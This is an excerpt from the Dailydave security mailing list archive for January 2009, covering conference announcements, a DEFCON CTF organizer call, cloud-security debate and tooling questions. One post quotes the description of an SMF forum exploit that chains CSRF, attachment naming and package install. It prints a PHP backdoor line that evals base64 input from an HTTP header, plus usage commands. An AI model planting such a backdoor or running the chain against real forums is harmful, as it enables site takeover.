author and published in the conference proceedings. Keynote Speakers include: James Lewis (CSIS) "Securing Cyberspace for the 44th Presidency" Mikko Hypponen (F-Secure) Chief Research Officer Conference registration information will be posted by February 1 at www.ccdcoe.org. Questions regarding this conference may be sent to cwcon at ccdcoe.org from January 1, 2009. Conference Manager: Kenneth Geers, CCD CoE Scientist ----- -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090114/8dc5ace2/attachment.html From ceh.wannabe at gmail.com Sat Jan 17 04:19:33 2009 From: ceh.wannabe at gmail.com (Simple Harris) Date: Sat, 17 Jan 2009 14:49:33 +0530 Subject: [Dailydave] No speculations about MS09-001? Message-ID: <8b5663e30901170119m616b37c3p9df567b5ce23fcd9@mail.gmail.com> Hi Lions, I was really expecting some nice humorous speculations about at least some of the bugs fixed in MS09-001, but so far its so disappointing. Isn't there any nice newbie friendly technique for exploiting a memset(ptr, 0, 24); in the kernel especially when the memory pool is so crowded? -- Simple Harris, wannabe-{GIAC GSE, CISSP-ISSEP, CISA, CEH} From dave at immunityinc.com Mon Jan 19 13:08:07 2009 From: dave at immunityinc.com (Dave Aitel) Date: Mon, 19 Jan 2009 13:08:07 -0500 Subject: [Dailydave] CSRF :> Message-ID: <4974C187.1080401@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 People are always like "Whatever" to CSRF. For some engagements, we're still working on the XSS bugs to get that kind of learnin' to our clients. But for an example of a truly excellent CSRF bug - one that gets a remote shell, check out this exploit... From: http://www.milw0rm.com/exploits/6993. How awesome is that exploit? I mention it just because someone tried it on forum.immunityinc.com today. :> - -dave ... # I - Session Code # # SMF administration panel is secured by a "session code", a kind of # password that must be provided by the admin browser when the admin # is editing data. # # But the session code is not required for SMF package installation. # Just to be clear : you don't need the "session code" to install the # package, but you do need a valid admin session. # # II - Package Installation # # Package installation works this way : # - The admin tells an archive file, which can be either gzip or zip, to SMF # - SMF un(g)zip it, and analyse the XML files (yes, it work with XML) # to add, replace or remove code from any SMF source code file. # # To precise an archive to SMF, the admin is supposed to go on this URL : # # http://[website]/SMF/index.php?action=packages;sa=install2;package=[filename] (1) # # Since $_REQUEST['package'] is not checked, we can install any file # on the server, even if the file is not in the Packages/ dir. # # Using CSRF, we can make an admin to install whatever package we want. # That does not seem really interesting for now, but be patient =) # # III - File upload in SMF; Attachments # # SMF let users upload files in two cases : # - You can upload an image to be your avatar # - You can upload attachments to every post you submit # # Since uploaded images are checked, they don't interest us for now. # # Attachments are not checked by SMF. # They are renamed and moved to the attachments/ directory. # They are renamed this way : # [id]_[name]_[ext][md5([name].[ext])] # # As you can see, there is no rand(), or other strange stuff : # we can easily find attachment name. # # The second part is more interesting now, no ? # # Now, we can submit a post with a gzip'ed attachment, and make the admin # click on a specific link, to install a package we uploaded ourself. # # I writed "click", so many of you may say "brr, that sucks". # So here come the wait-I've-not-finished part. # # IV - Wait-I've-not-finished part # # SMF allows us to display remote images in our posts, using [img][/img] # We can just set our image URL to ... (1) : when the admin will see our post, # the package will be installed. # # V - Classic Scenario # # 1. We submit a fantastic post containing our nasty-attached-gzip'ed package, ready # to be installed. # 2. We guess the attachment name, that's pretty easy because we can retrieve the # attachment ID. # 3. We modify our post, adding an [img](1)[/img], replacing [filename] by # ../attachments/[the_name_you_just_found] # 4. The administrator discover our fantastic post on his fantastic forum ... # 5. His browser discovers our image : it goes to the specified url to download it. # wooops. The package is installed. # # VI - Exploit # # The exploit will login with your user account, and submit a new post/topic containing an # attachment, a gzipped package, which permits remote code execution once installed. # Then it will obtain the attachment ID, determine attachment name, and modify your topic to # add a remote image (using [img][/img]). # Then you'll have to wait for an admin to see your post ... and the package will be installed. # # VII - Notes # # - Do not forget to change SUBJECT and MESSAGE constants, to make your post a little more realistic. # - The current gzipped package is supposed to put PHP code at the end of Settings.php file. # - Code: if(isset($_SERVER['HTTP_SHELL'])) { print 1234567890;eval(base64_decode($_SERVER['HTTP_SHELL']));print 1234567890;exit(); } # # First run the exploit like this : # eg : php exploit.php -url http://localhost/forum/ -bid 2 -user tester:passwd # And when you think the admin viewed your post, run the shell :) # eg : php exploit.php -url http://localhost/forum/ -shell # -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJdMGGtehAhL0gheoRAiLVAJ4gGpm4sp2K9qA0S9K3VvtqGyhZ3wCdEHN7 PxjB0j9m7UBldWQUgx+bkgU= =V15a -----END PGP SIGNATURE----- From prabu at hackinthebox.org Tue Jan 20 17:13:16 2009 From: prabu at hackinthebox.org (Praburaajan) Date: Wed, 21 Jan 2009 06:13:16 +0800 Subject: [Dailydave] Videos from HITBSecConf2008 - Malaysia released! Message-ID: <49764C7C.9090501@hackinthebox.org> The videos from HITBSecConf2008 - Malaysia are now available for download! Day 1 ===== http://thepiratebay.org/torrent/4654588/HITBSecConf2008_-_Malaysia_Videos___Day_1 Keynote Address 1: The Art of Click-Jacking - Jeremiah Grossman Keynote Address 2: Cyberwar is Bullshit - Marcus Ranum Presentations: - Delivering Identity Management 2.0 by Leveraging OPSS - Bluepilling the Xen Hypervisor - Pass the Hash Toolkit for Windows - Internet Explorer 8 - Trustworthy Engineering and Browsing - Full Process Reconsitution from Memory - Hacking Internet Kiosks - Analysis and Visualization of Common Packers - A Fox in the Hen House - UPnP IGD - MoocherHunting - Browser Exploits: A New Model for Browser Security - Time for a Free Hardware Foundation? - Mac OS Xploitation - Hacking a Bird in The Sky 2.0 - How the Leopard Hides His Spots - OS X Anti-Forensics Techniques Day 2 ===== http://thepiratebay.org/torrent/4654974/HITBSecConf2008_-_Malaysia_Videos___Day_2 Keynote Address 3: Dissolving an Industry as a Hobby - THE PIRATE BAY Presentations: - Pushing the Camel Through the Eye of a Needle - An Effective Methodology to Enable Security Evaluation at RTL Level - Remote Code Execution Through Intel CPU Bugs - Next Generation Reverse Shell - Build Your Own Password Cracker with a Disassembler and VM Magic - Decompilers and Beyond - Cracking into Embedded Devices and Beyond! - Client-side Security - Top 10 Web 2.0 Attacks === On a related note, the registration for HITBSecConf2009 - Dubai (20th - 23rd April) is now open! http://conference.hitb.org/hitbsecconf2009dubai/ The Call for Papers (CFP) for HITBSecConf2009 - Malaysia (October 5th - 8th) will open in March 2009. A belated Happy New Year from all of us at Hack in The Box and may all your exploits result in root shell! :) The HITB Team. From dtangent at defcon.org Tue Jan 20 18:51:31 2009 From: dtangent at defcon.org (The Dark Tangent) Date: Tue, 20 Jan 2009 15:51:31 -0800 Subject: [Dailydave] DEFCON 17 CTF Call for new Organizers! Message-ID: <022501c97b5a$14312d10$3c938730$@org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 DEFCON 17 CTF Call for new Organizers! Call for DEFCON Capture the Flag Organizers Version 2.0. Please spread this announcement far and wide! - ------------------------------------ WANTED: An evil large multinational corporation, or... An nefarious group of genius autonomous hackers, or... A shadowy government organization from somewhere in the world TO: Host, recreate, and innovate the world's most (in)famous hacking contest. WHY: For everlasting fame, intrusive media interviews, the respect of your peers, or the envy of your enemies. Do you have what it takes and know what we're talking about? THE STORY THUS FAR: All things must change, and after years of hard work and consistent advances Kenshoto has decided that it is time to let someone else have a chance to run CTF. We will forever miss their crazy videos and clever configurations. After taking it to the next level, creating a spectator sport out of geeks sitting at their keyboards 0wning machines, and helping CTF gain fabulous recognition around the world, Kenshoto has officially retired as the organizer and hosts of DEFCON's CTF. The contest is not over, merely in transition to the next keepers of the flame. This is the opportunity you and your crew, company, or government have been waiting for! You too can pour your heart, countless thousands of hours into planning, producing, and executing the world's most famous contest of hacking skills. All of the contests at DEFCON are run by volunteers, and CTF is no different. My intent is to make a game that's fun for its participants. Kenshoto did a fabulous job of allowing CTF to be a team and spectators sport through scoring visualizations, commentators, game updates. They took it to a new level in one area, and you can take it to another. The heart of hacking has many facets! CTF is made of many parts from the actual teams, the organizers, observers, third party supporters, the press, con attendees wanting in on some action, and those newbies wondering WTF. YOUR CONSTRAINTS: You must design a bad-ass contest. This contest could have a multiplayer / team aspect, but does not have to. Your contest can be based on previous games, but shouldn't be a mere replication of previous games. You can determine the teams/participants before DEFCON through a pre-qualification phase, or at the conference with a first come-first served approach. You can have multiple contests (for example, one contest with individuals, one with teams). The contest can be totally electronic, or it can take into account social engineering, physical security bypass, even hardware modification. You determine the constraints, size of teams, deciding if remote teams can play - really almost everything is up in the air. You design the network topology. You determine the rules. Your group will determine the winner, and the losers. The idea behind this CFP is not to ask people to reproduce past Capture the Flags, but to have your group reinvent and create something new, based on the same creativity and energy that CTF is known for. Challenge your friends! YOU MUST: Clearly communicate the rules to the participants before the contest, set up clear eligibility requirements (if any) before the conference, set up the network, provide any infrastructure that you wish to be part of the game, referee the game while it is taking place, create a scoring system that observers can view to get an idea of what is going on, and determine winners. The easier it is for contestants to understand how to win, the more fair the contest will feel. The contest must end no later than two hours before the end of DEFCON (5pm Sunday) in order to provide time for final scoring and the awards ceremony. YOU MUST NOT: Interfere with the DEFCON networks (i.e.: it must be a separate network), interfere with the 'live internet', involve non-consensual parties (i.e.: anyone who hasn't explicitly agreed to take part in the contests), take bribes that are not equally shared with the DEFCON staff. You must be totally neutral and fair. In the past network traffic on CTF has been captured for later forensic analysis and shared with the community to further ids and network sniffer developers. Expect that should we want to do this again there is a way to give access to those wanting to capture traffic while not actively participating in the contest. SUGGESTIONS: Allowing 'lone gunman' to participate (not require group play). This could be a separate contest, or they could participate in competition with teams (handicaps for teams, perhaps) Allowing 'outside players', perhaps a VPN connection with one representative at DEFCON, the rest of a shadowy team located elsewhere in the globe. Incorporating non intrusion/defense techniques to the game - stenography, covert communication channels, riddles/puzzles, social engineering, hardware hacking, radio direction finding, etc. A 'theme' (like forensics, covert channels, attacking, defending, application security, host security, etc.) that would be announced beforehand with the contest focused around the theme. YOU WILL BE JUDGED: On any innovations or revolutionary enhancements to the game. On the feasibility of your team getting all the work done (note: we will publicly humiliate you if you get accepted and fail to perform!). On the amount of fun (as measured in FunMeters) that participants will have. Once you submit your ideas (Yes you can submit more than one concept) we will start communicating with you to clarify anything we don't understand. Feel free to ask us questions so you know what you are getting yourself into. A group that work well together is almost a must. Ghetto Hackers and Kenshoto did very well because they had a large enough pool of talent to draw upon when building their automated systems. RESOURCES WE CAN PROVIDE: Badges to the conference and access to the CTF area for setup on Thursday, the day before the con. Physical space roughly equal to that which has been provided at past DEFCONs. Tables for participants to use. Screens and LCD projectors to display data with. Network connections from the net if necessary. Some network gear and power strips - please let us know early what you need so we can plan for it. Prizes for the winning people or teams. If you want to turn the CTF area into a giant free-for-all we can get the power strips and tables. If you want it to be like years past with eight team tables we can do that too. Want to drop some clues in the printed con program? Want to incorporate some clues or components into the attendee badges? We can do that too! Winning teams get a maximum of eight Black Badges. RESEARCH POINTERS: If you haven't been to DEFCON before, you should understand the environment your contest must operate in! https://www.defcon.org/ will get you started. These may help give you an idea about past contests, what has worked, and what hasn't. Ceazar gave a presentation on running hacking contests at Black Hat Asia (learn from a master): https://www.blackhat.com/presentatio...p-04-eller.pdf A rundown of DEFCON 16 CTF by atlas of team l at stplace (DEFCON 14 and 15 CTF Winners): http://atlas.r4780y.com/cgi-bin/atla...080808-sk3wl3d Walkthroughs of the last 3 CTF Competitions : http://nopsr.us Interview with Def Con CTF Winning Team Member Vika Felmetsger (2005): http://taosecurity.blogspot.com/2005...f-winning.html An article on the 2004 CTF on Network World: http://www.networkworld.com/news/2004/080904defcon.html Ceazar's How to Win the DEFCON CTF: https://www.defcon.org/html/defcon-1...echtv-ctf.html So you want to play a game? HERE IS THE PROCESS: 1.Fill out the application below. You will receive an acknowledgment that your submission was received within 48 business hours of us receiving it unless we are snowed in and the interwebs are broke. 2.We will use relatively simple criteria to judge your entry. 1:) Feasibility of your team pulling it off taking into consideration who is involved in your team, resources you have, etc. 2:) The amount of fun we imagine the participants will have with your contest, 3:) the coolness or innovation you bring to the contests. 3.We will contact finalists and ask them further questions, and talk over any questions that we will inevitably have. 4.We will announce the winner(s) on as soon as we can after the close of the CTF CFP date. It could be possible that we will choose multiple teams that run concurrent but different types of contests. 5.We will hammer out details over the phone, participating in your game creation (not interfering with it, just ensuring everything is going smoothly). We will conference call with you and may fly you out to sunny Seattle to meet with us to discuss planning for the event. 6. Kenshoto has volunteered to spend time working with the selected team, answering their questions, explaining their process and what they learned in designing their game. They have a lot of experience and skill so this is a resource you will want to take advantage of. APPLICATION: All contact information will be kept private, and not disclosed outside the DEFCON planning organization. About you and your group Name of your organization: Name of primary contact: Email Address of Primary contact: Phone number of primary contact: Number of people in your organization (that will actively be participating in creating/planning/executing CTF): Experience team members have had in planning events (This could be a bake sale with 500 people, or a DoD briefings for 20 people, something that indicates some planning experience): Technical ability of team. This would include a general list of people's abilities * networking, hardware, etc and support the idea you can pull this off: Physical resources (if any) that you will be bringing to help run CTF such as a disco ball, robots or enigma machines. This to help us plan to accommodate it with the hotel if you require extra power or special fire marshal approval for your Cray 1 cooling towers.: What experience have your team members had in playing CTF in the past. This is not a requirement, but shows real-world knowledge of the game as it has been played in the past.: Explain you vision for CTF - -Explain, in a general manner, your vision of your CTF. - - Explain how you hope the attendees will experience it. For example, they sign up on-line, get a secret package in the mail, start blindfolded with an unusual laptop? Are their certain crises points you will introduce during the game to confuse or add to the pressure? - -Provide three reasons your group should host CTF. - -How do players or teams qualify (if there are qualifications)? - -Is it multi player or single-player, or a combination? - -What innovations or new ideas are you bringing to CTF? - -How long will the contest take, will it be 24x7, 8 hour shifts, etc? - -What technical work is required to execute your plan. This includes setting up environments beforehand, pre-qualification work if any, writing a scoring system, etc.? - -Give an outline of the rules that will be presented to the participants: - -Why do you want to do this? - -What hardware resources do you request or need from DEFCON? - -Explain what you believe is the best way to guage a hacker's abilities, and how your vision of the contest could do this? - -Tell us anything else that you think may be important or that we might consider in choosing your group to host CTF. Send 'em in! If you are submitting multiple ideas please make each one a separate email so when printed and forwarded between judges there is less confusion. Deadline is February 28th, 2009. Submissions go to ctf [at] defcon [d0t] org A discussion area has been created on the DEFCON forums under the DEFCON 17 Events section to cover new ideas, ask for feedback, and get an idea of what is going on. https://forum.defcon.org/forumdisplay.php?f=458 New announcements will be on the main DEFCON web site as well: https://www.defcon.org/ Feel free to join the discussion, ask people for feedback on your ideas, ask questions.. use all the resources at your disposal! Thank you! The Dark Tangent -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.9.1 (Build 287) Charset: us-ascii wsBVAwUBSXZjxw6+AoIwjTCUAQhCFAf7B7gaVZohJBZZwR7sriO89V177xO5Dn09 5Sg3bbXj9bJuo6/1LsGJkPYH23yCyNid5rJaFrbtJ3I7/l2yGEa/pfIXSU5qdBpl LuXtd7WhpSr1Li/ydJOXtxr1CWxgwm2HIezyvKJ0ZBsYOMO8Q76o0S8NvsYicTiV l4QktKcQSMGBRqjjuFc9Je9CjtsT82eGibGJUxg7bhEksVPT1YuFVz+kwrMo3gcs v9T41ZXuItMdU1H9QJhp/S64yhsHFZ2bAq4hufFAXhf8uWetdf9QnwYXAwhza80N S74DfmC4NHPKLnLk95JCR9deGymJI7/cwCqS5F1RPgqHNhAM+qWnDA== =yGy0 -----END PGP SIGNATURE----- From dave at immunityinc.com Wed Jan 21 23:06:40 2009 From: dave at immunityinc.com (Dave Aitel) Date: Wed, 21 Jan 2009 23:06:40 -0500 Subject: [Dailydave] The magic in the cloud Message-ID: <4977F0D0.9060305@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Lately, while I get up to speed on Django and whatever Zen it is that makes Twitter a huge hit and FriendFeed something you only visit once, I've been obsessing about a comment someone made to me at a party. They said "What we want is grid computing, like with our mainframes, but we want to outsource the whole cloud." Which is funny, because Terremark, another major Miami technology company, recently opened up its "outsource your cloud" service. Of course, lots of companies let you buy VPS's, but usually these are companies that are cannibalizing sales of shared hosting machines for PHP apps, not backend processing for real companies. But if you can outsource, say, your trading algorithms onto someone else's CPU, then why not just outsource all your sensitive data? Why not make this someone else's problem, assuming you can get a contract or insurance to cover you financially? By the time it all bursts like the real estate bubble, some other CTO will be left holding the smoke anyways. "Cloud computing" has a magic ring to it. It makes it someone else's problem, but somehow hides the security issues. No CTO in his right mind would ever consider shared hosting as protected by Unix Permissions. Even Solaris Containers and Zones and newfangled isolation hotness never seems to pass muster. If an attacker can buy space on the same kernel, it's not allowed. No amount of crypto magic, kerberos, key distribution, or PKI can bless it. So why on earth is it ok if the attacker can buy space on the same hypervisor? By what trick of psychology is that different? Speaking of different, I wanted to point out that Immunity has partnered up with CanSecWest and we're offering free admission to this year's 2009 conference in March. You're probably already going, but if you wanted to go for free, which I guarantee makes it easier to find budget for, you should email admin at immunityinc.com and find out how. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJd/DQtehAhL0gheoRAs40AJ4w4OVqvLDr/9BXL7SeXoobQa3BggCeL8aq iVDsyxyhA08hZNhVLWi2zQQ= =RvxL -----END PGP SIGNATURE----- From rafal at ishackingyou.com Thu Jan 22 01:41:28 2009 From: rafal at ishackingyou.com (Rafal @ IsHackingYou.com) Date: Thu, 22 Jan 2009 00:41:28 -0600 Subject: [Dailydave] The magic in the cloud In-Reply-To: <4977F0D0.9060305@immunityinc.com> References: <4977F0D0.9060305@immunityinc.com> Message-ID: So... how is the hype and magic around "Cloud Computing" and "Cloud Security" any different (aside from the context, obviously) than the wave of business process outsourcing we did to the cloud (sorry, we call it off-shore'ing)? Your key points if I understand them are outsourcing of critical company information, shared environments as related to attacks, and liability write-off to a 3rd party... if you strip away the buzz-phrase "cloud computing" you can replace it with "process off-shore'ing" or any other thing we've stupidly done over the last 5 years in the name of "cost savings" or some such stupidity... Anyway... same pig, different lipstick if you ask me. __ Rafal M. Los Security & IT Risk Strategist - Blog: http://preachsecurity.blogspot.com - LinkedIn: http://www.linkedin.com/in/rmlos -------------------------------------------------- From: "Dave Aitel" Sent: Wednesday, January 21, 2009 10:06 PM To: Subject: [Dailydave] The magic in the cloud -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Lately, while I get up to speed on Django and whatever Zen it is that makes Twitter a huge hit and FriendFeed something you only visit once, I've been obsessing about a comment someone made to me at a party. They said "What we want is grid computing, like with our mainframes, but we want to outsource the whole cloud." Which is funny, because Terremark, another major Miami technology company, recently opened up its "outsource your cloud" service. Of course, lots of companies let you buy VPS's, but usually these are companies that are cannibalizing sales of shared hosting machines for PHP apps, not backend processing for real companies. But if you can outsource, say, your trading algorithms onto someone else's CPU, then why not just outsource all your sensitive data? Why not make this someone else's problem, assuming you can get a contract or insurance to cover you financially? By the time it all bursts like the real estate bubble, some other CTO will be left holding the smoke anyways. "Cloud computing" has a magic ring to it. It makes it someone else's problem, but somehow hides the security issues. No CTO in his right mind would ever consider shared hosting as protected by Unix Permissions. Even Solaris Containers and Zones and newfangled isolation hotness never seems to pass muster. If an attacker can buy space on the same kernel, it's not allowed. No amount of crypto magic, kerberos, key distribution, or PKI can bless it. So why on earth is it ok if the attacker can buy space on the same hypervisor? By what trick of psychology is that different? Speaking of different, I wanted to point out that Immunity has partnered up with CanSecWest and we're offering free admission to this year's 2009 conference in March. You're probably already going, but if you wanted to go for free, which I guarantee makes it easier to find budget for, you should email admin at immunityinc.com and find out how. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJd/DQtehAhL0gheoRAs40AJ4w4OVqvLDr/9BXL7SeXoobQa3BggCeL8aq iVDsyxyhA08hZNhVLWi2zQQ= =RvxL -----END PGP SIGNATURE----- _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave From crioux at noctem.org Thu Jan 22 09:52:19 2009 From: crioux at noctem.org (Christien Rioux) Date: Thu, 22 Jan 2009 09:52:19 -0500 Subject: [Dailydave] The magic in the cloud In-Reply-To: References: <4977F0D0.9060305@immunityinc.com> Message-ID: <5680af290901220652i5794d303q292f0435afbbeb4@mail.gmail.com> At least for Google, I predict that NaCl (Google Native Client) will not just be used to secure the Chrome browser plugins (as publically stated) , but also to secure native applications running on Android (which is currently of huge interest to Google), and to secure cloud applications (which I hope they've thought of!) running natively on the infrastructure. Why not just sandbox everything to raise the bar for the attacker significantly? --chris On Thu, Jan 22, 2009 at 1:41 AM, Rafal @ IsHackingYou.com wrote: > So... how is the hype and magic around "Cloud Computing" and "Cloud > Security" any different (aside from the context, obviously) than the wave of > business process outsourcing we did to the cloud (sorry, we call it > off-shore'ing)? Your key points if I understand them are outsourcing of > critical company information, shared environments as related to attacks, and > liability write-off to a 3rd party... if you strip away the buzz-phrase > "cloud computing" you can replace it with "process off-shore'ing" or any > other thing we've stupidly done over the last 5 years in the name of "cost > savings" or some such stupidity... > > Anyway... same pig, different lipstick if you ask me. > > __ > Rafal M. Los > Security & IT Risk Strategist > > - Blog: http://preachsecurity.blogspot.com > - LinkedIn: http://www.linkedin.com/in/rmlos > > -------------------------------------------------- > From: "Dave Aitel" > Sent: Wednesday, January 21, 2009 10:06 PM > To: > Subject: [Dailydave] The magic in the cloud > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Lately, while I get up to speed on Django and whatever Zen it is that > makes Twitter a huge hit and FriendFeed something you only visit once, > I've been obsessing about a comment someone made to me at a party. > They said "What we want is grid computing, like with our mainframes, > but we want to outsource the whole cloud." > > Which is funny, because Terremark, another major Miami technology > company, recently opened up its "outsource your cloud" service. Of > course, lots of companies let you buy VPS's, but usually these are > companies that are cannibalizing sales of shared hosting machines for > PHP apps, not backend processing for real companies. > > But if you can outsource, say, your trading algorithms onto someone > else's CPU, then why not just outsource all your sensitive data? Why > not make this someone else's problem, assuming you can get a contract > or insurance to cover you financially? By the time it all bursts like > the real estate bubble, some other CTO will be left holding the smoke > anyways. > > "Cloud computing" has a magic ring to it. It makes it someone else's > problem, but somehow hides the security issues. No CTO in his right > mind would ever consider shared hosting as protected by Unix > Permissions. Even Solaris Containers and Zones and newfangled > isolation hotness never seems to pass muster. If an attacker can buy > space on the same kernel, it's not allowed. No amount of crypto magic, > kerberos, key distribution, or PKI can bless it. > > So why on earth is it ok if the attacker can buy space on the same > hypervisor? By what trick of psychology is that different? > > Speaking of different, I wanted to point out that Immunity has > partnered up with CanSecWest and we're offering free admission to this > year's 2009 conference in March. You're probably already going, but if > you wanted to go for free, which I guarantee makes it easier to find > budget for, you should email admin at immunityinc.com and find out how. > > - -dave > > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iD8DBQFJd/DQtehAhL0gheoRAs40AJ4w4OVqvLDr/9BXL7SeXoobQa3BggCeL8aq > iVDsyxyhA08hZNhVLWi2zQQ= > =RvxL > -----END PGP SIGNATURE----- > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From dave at immunityinc.com Fri Jan 23 15:16:05 2009 From: dave at immunityinc.com (Dave Aitel) Date: Fri, 23 Jan 2009 15:16:05 -0500 Subject: [Dailydave] The most important ability is being able to hide your abilities. Message-ID: <497A2585.1060409@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 So much of what we do is writing things that are not rootkits, but essentially use similar techniques: 14:58 < justin> so its like 0x4ad01214 is the IAT entry for CreateProcessW 14:58 < justin> this allows me to do C:>notepad.exe and test my hook 14:58 < justin> and imm.inject_dll("C:\\UpprivHook.dll") 14:58 < justin> to test 14:59 < dave> cool 14:59 < dave> imm.inject_dll == totally awesome Right now Immunity is building something that requires a userland hook, and a kernelmode hook. Honestly, I think the world needs another book on Windows Rootkits! Oh, and congrats to Mike Reavy and Andrew Cushman! http://www.cio.com/article/477472/Microsoft_Security_Response_Center_Gets_New_Boss - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJeiWFtehAhL0gheoRAp5DAJ9/C+90zg/i5KZ00wm6JOR9yh7WnQCbBvZq BQVzh6o+qxPhr+V28Mj0yog= =YqH2 -----END PGP SIGNATURE----- From dave at immunityinc.com Tue Jan 27 09:24:01 2009 From: dave at immunityinc.com (Dave Aitel) Date: Tue, 27 Jan 2009 09:24:01 -0500 Subject: [Dailydave] Hello Microsofties! Message-ID: <497F1901.2090405@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 So as a side project I'm doing something weirder than usual: C#. Well, it doesn't have to be C#. Ideally it'd be IronPython - but it's CLR which means the underlying language is essentially C# no matter what your syntax looks like. Here's where we're coming from over at Immunity. It's great to have a penetration testing tool. Everyone loves a nice GUI popping up shells. But, in fact, for some large percentage of our customers you're really only using that tool in order to fit it into your internal business processes which Immunity typically knows nothing about. While we have a number of people writing exploits using the CANVAS Python API, it's not necessarily the way everyone wants to extend CANVAS. For example, for unknown reasons, not everyone knows Python! So instead we have an XML-RPC API. Ideally every network attack tool would have the same XML-RPC API so you could talk to them all with the same client code, but that might be asking a lot in the short run. In the meantime, you have a ton of people using Visio with their network diagrams, and I want to give them a way to connect to CANVAS's running on those subnets and do cool things. Imagine if you could just right click a Visio picture and say "What OS is this really?" or "Is this machine patched for MS08_067?" or "Color all the MS machines on this network red, and the Linux ones Blue" or "Tell me which machines are on this network" or "Portscan these and tell me which ones are IIS". Really, the possibilities are endless when it comes to business logic automation. Essentially, a web application these days is just one instance of something consuming your XML-RPC API. Everyone else can build their own web mashups, or even thick clients based on their own business tools. Welcome to Web 2.0! :> Anyways, my question is: Who has done something like this with Visio? What do you recommend - and where is the IRC channel for quick help with the Visio API? :> - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJfxkAtehAhL0gheoRAovYAJ0SUGxwYx2Ar+qoPeVyvaXx7Bfg+gCfVOii 7m/4FA8nFor060vtlPeZxnY= =DtNJ -----END PGP SIGNATURE----- From dave at immunityinc.com Tue Jan 27 18:13:56 2009 From: dave at immunityinc.com (Dave Aitel) Date: Tue, 27 Jan 2009 18:13:56 -0500 Subject: [Dailydave] For those: a collection Message-ID: <497F9534.7090607@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 For those who like XKCD: http://icantdrawfeet.com/2008/10/23/onandonandon/ For those who like to eat at my fav Iraqi restaurant in Laurel (hey, I remember that guy!): http://www.cicentre.com/spycase/DELLEMY_Saubhe_Jassim_al.html For those who read Japanese and use CANVAS (partial translation - I'm working on it!): http://www.immunityinc.com/downloads/jp1.png For those who speak English or Japanese and want to write Vista Heap Overflows: WHAT: Understanding and Exploiting Windows Vista Heap Overflows WHEN: February 17-20, 2009 WHERE: Tokyo, Japan COST: $5,618USD (tax included) HOW: admin at immunityinc.com - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJf5U0tehAhL0gheoRAvCgAJ44+1E1ZzU9ERXs3W/EuQrf2U567gCfe5/Z bjnmjU7MYHcN74bc+LppDl0= =poV/ -----END PGP SIGNATURE----- From mhtajik at gmail.com Tue Jan 27 09:54:09 2009 From: mhtajik at gmail.com (Mohammad Hosein) Date: Tue, 27 Jan 2009 18:24:09 +0330 Subject: [Dailydave] Hello Microsofties! In-Reply-To: <497F1901.2090405@immunityinc.com> References: <497F1901.2090405@immunityinc.com> Message-ID: <26f61db50901270654q18205eaemeafd04c288c97337@mail.gmail.com> as much as it may look embarrassing since this is a hacker forum , once i did a fairly complex Office Add-in development using tools come from "Add-in Express" and it saves me a lot of time , and well , money . but basically what you need is to instantiate a dozen of Office's whacky COM classes and call a bunch of methods . its unreasonably undocumented and hard to debug . instead , this package gave me a couple of components and Wizards helped me ignore the complexity and just go on with my business . http://www.add-in-express.com On Tue, Jan 27, 2009 at 5:54 PM, Dave Aitel wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > So as a side project I'm doing something weirder than usual: C#. Well, > it doesn't have to be C#. Ideally it'd be IronPython - but it's CLR > which means the underlying language is essentially C# no matter what > your syntax looks like. > > Here's where we're coming from over at Immunity. It's great to have a > penetration testing tool. Everyone loves a nice GUI popping up shells. > But, in fact, for some large percentage of our customers you're really > only using that tool in order to fit it into your internal business > processes which Immunity typically knows nothing about. While we have > a number of people writing exploits using the CANVAS Python API, it's > not necessarily the way everyone wants to extend CANVAS. For example, > for unknown reasons, not everyone knows Python! > > So instead we have an XML-RPC API. Ideally every network attack tool > would have the same XML-RPC API so you could talk to them all with the > same client code, but that might be asking a lot in the short run. > > In the meantime, you have a ton of people using Visio with their > network diagrams, and I want to give them a way to connect to CANVAS's > running on those subnets and do cool things. Imagine if you could just > right click a Visio picture and say "What OS is this really?" or "Is > this machine patched for MS08_067?" or "Color all the MS machines on > this network red, and the Linux ones Blue" or "Tell me which machines > are on this network" or "Portscan these and tell me which ones are > IIS". Really, the possibilities are endless when it comes to business > logic automation. > > Essentially, a web application these days is just one instance of > something consuming your XML-RPC API. Everyone else can build their > own web mashups, or even thick clients based on their own business > tools. Welcome to Web 2.0! :> > > Anyways, my question is: Who has done something like this with Visio? > What do you recommend - and where is the IRC channel for quick help > with the Visio API? :> > > - 